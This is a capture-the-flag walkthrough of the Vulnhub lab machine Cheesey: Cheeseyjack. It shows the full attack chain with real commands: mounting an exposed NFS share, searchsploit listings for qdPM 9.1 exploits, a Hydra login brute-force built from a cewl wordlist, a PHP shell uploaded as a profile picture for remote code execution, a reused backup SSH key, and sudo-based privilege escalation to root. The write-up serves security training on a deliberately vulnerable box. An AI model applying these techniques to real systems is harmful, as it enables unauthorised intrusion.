Vulnhub - CHEESEY: CHEESEYJACK
Introduction
Cheeseyjack aims to be an easy to medium level real-world-like box. Everything on this box is designed to make sense, and possibly teach you something.
Enumeration will be key when attacking this machine.
Hint: A cewl tool can help you get past a login page.
This is CHEESEY: CHEESEYJACK from vulnhub.
Ports
We have quite a few ports here:
- 22/tcp open ssh
- 80/tcp open http
- 111/tcp open rpcbind
- 139/tcp open netbios-ssn
- 445/tcp open microsoft-ds
- 2049/tcp open nfs
- 33060/tcp open mysqlx
- 33693/tcp open unknown
- 34577/tcp open unknown
- 38839/tcp open unknown
- 57011/tcp open unknown
So we’ve got SSH, HTTP, what looks like an NFS share, SMB and some other stuff. Let’s investigate.
SMB
No anonymous login; moving along …
NFS
We can mount the share:
root@kali:/opt/vulnhub/cheesey# mkdir mountpoint
root@kali:/opt/vulnhub/cheesey# mount -t nfs 192.168.1.134:/ mountpoint
root@kali:/opt/vulnhub/cheesey# cd mountpoint/
root@kali:/opt/vulnhub/cheesey/mountpoint# ls -lash
total 12K
4.0K drwxr-xr-x 20 root root 4.0K Sep 24 19:23 .
4.0K drwxr-xr-x 5 root root 4.0K Oct 30 08:37 ..
4.0K drwxr-xr-x 4 root root 4.0K Sep 24 23:23 home
root@kali:/opt/vulnhub/cheesey/mountpoint# cd home
root@kali:/opt/vulnhub/cheesey/mountpoint/home# ls -lash
total 12K
4.0K drwxr-xr-x 4 root root 4.0K Sep 24 23:23 .
4.0K drwxr-xr-x 20 root root 4.0K Sep 24 19:23 ..
4.0K drwxr-xr-x 16 fsociety fsociety 4.0K Oct 9 06:27 ch33s3m4nAnd we’ve got a /home directory belonging to ch33s3m4n.
In the /Downloads directory is a file called qdPM_9.1.zip. We can copy this to our local machine and extract the archive; it’s a set of files for a webapp called qdPM, presumably version 9.1. Checking searchsploit, we can see there are a number of exploits:
root@kali:/opt/vulnhub/cheesey# searchsploit qdpm
--------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
qdPM 7 - Arbitrary File upload | php/webapps/19154.py
qdPM 7.0 - Arbitrary '.PHP' File Upload (Metasploit) | php/webapps/21835.rb
qdPM 9.1 - 'cfg[app_app_name]' Persistent Cross-Site Scripting | php/webapps/48486.txt
qdPM 9.1 - 'filter_by' SQL Injection | php/webapps/45767.txt
qdPM 9.1 - 'search[keywords]' Cross-Site Scripting | php/webapps/46399.txt
qdPM 9.1 - 'search_by_extrafields[]' SQL Injection | php/webapps/46387.txt
qdPM 9.1 - 'type' Cross-Site Scripting | php/webapps/46398.txt
qdPM 9.1 - Arbitrary File Upload | php/webapps/48460.txt
qdPM 9.1 - Remote Code Execution | php/webapps/47954.py
qdPM < 9.1 - Remote Code Execution | multiple/webapps/48146.py
--------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
root@kali:/opt/vulnhub/cheesey# Presumably this is our target.
HTTP
Turning to the website, we can run a gobuster and turn up a couple of interesting things - /it_security, which contains a note:
Cheese you complete idiot. You hired me to ensure your webapp project stayed secure and you use a weak password like that? What’s wrong with you? A baby could guess that!
-crab
And /project_management, which has a login page for the qdPM 9.1 installation. The home page of the website is a countdown to launch type thing.
Now, the login wants an email address and password, presently we don’t have either of those things - or do we?
On the homepage there is a contact email address: info@cheeseyjack.local. So presumably that is the format we’re looking for. But who is the user? Entering the credentials:
info@cheeseyjack.local:password
returns a message:
Error: No match for Email and/or Password
So that’s not helpful. There is an option for Password forgotten which takes us to http://192.168.1.134/project_management/index.php/login/restorePassword
Entering our ‘info’ address there gives this message:
Error: No records found
What if we use our username we found earlier, i.e. ch33s3m4n@cheeseyjack.local? Well, we get this message instead:
A new password has been sent to your e-mail address
So, we know this email address is valid, and is probably what we want. Unfortunately it does also seem to reset the password on the box! So now we’ve got to reset our VM. Whoops. Oh well, at least this isn’t a real machine.
Now, we got a hint about cewl and about a weak password, so we should listen to that. There aren’t actually many pages (/, /it_security, /project_management) so we can build a small-ish list. I tried running it with Hydra like so:
root@kali:/opt/vulnhub/cheesey# hydra 192.168.1.135 http-form-post "/project_management/index.php/login:login%5B_csrf_token%5D=3649fdf0dc6d1c0870b97830e9296672&login%5Bemail%5D=^USER^&login%5Bpassword%5D=^PASS^&http_referer=:Error" -P ./cewl.list -l 'ch33s3m4n@cheeseyjack.local'but it didn’t tell me when I found the right password. Burp Intruder does, but only by the length of the response - the correct password gives a longer response than incorrect ones, but it’s the same HTTP Status Code.
The password we end up using is qdpm, and we can log in.
One more thing
One more note about the website - if we refer to the qdPM_9.1.zip file we downloaded from the NFS share earlier, we can see the directory structure of the qdpm installation. From that, we can find there is a directory (as an example) called /core/config, and if we go to http://192.168.1.135/project_management/core/config/ then we can get a directory listing and access the files without being logged in.
With this we can find databases.yml which contains some credentials:
qdpm:chucktaylors4lyfe
But ultimately this doesn’t help us because MYSQLX on port 33060 won’t accept connections from external IPs. Still, it’s worth noting.
qdPM Exploit
I grabbed one of the exploits from searchsploit and tried to run it as-is (it was a python script) but it didn’t seem to work. A quick flick through the code revealed it was very simple anyway - the concept was just setting a profile picture for the user account to some arbitrary PHP code. It’s literally as simple as using the webapp GUI to upload a PHP shell as the profile picture and then navigating to http://192.168.1.135/project_management/uploads/users/ with a listener open and clicking on the uploaded shell. Easy peasy.
On the box
On the box we find a couple of potentially interesting users in crab and (of course) ch33s3m4n. We can look in crab’s home and find this:
www-data@cheeseyjack:/home/crab$ cat todo.txt
cat todo.txt
1. Scold cheese for weak qdpm password (done)
2. Backup SSH keys to /var/backups
3. Change cheeses weak password
4. Milk
5. Eggs
6. Stop putting my grocery list on my todo listsWhich leads us to this:
www-data@cheeseyjack:/var/backups/ssh-bak$ file key.bak
file key.bak
key.bak: OpenSSH private keyThis is the SSH private key for crab. Copying it to our machine, we can chmod 600 it and SSH in as crab.
root@kali:/opt/vulnhub/cheesey# ssh -i id_rsa crab@192.168.1.134
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-48-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantagePrivesc
Once we’re in as crab, we find he can run things in his /.bin directory as root. So we can make ourselves a file and execute it.
crab@cheeseyjack:/dev/shm$ sudo -l
Matching Defaults entries for crab on cheeseyjack:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User crab may run the following commands on cheeseyjack:
(ALL : ALL) ALL
(root) NOPASSWD: /home/crab/.bin/So here we go:
crab@cheeseyjack:~$ cd .bin
crab@cheeseyjack:~/.bin$ nano test
crab@cheeseyjack:~/.bin$ chmod +x test
crab@cheeseyjack:~/.bin$ sudo -u root /home/crab/.bin/test
root@cheeseyjack:/home/crab/.bin# whoami
root
root@cheeseyjack:~# cat root.txt
**ASCII Art Removed**
WOWWEEEE! You rooted my box! Congratulations. If you enjoyed this box there will be more coming.
Tag me on twitter @cheesewadd with this picture and ill give you a RT!In this instance test was just a bash script that started bash.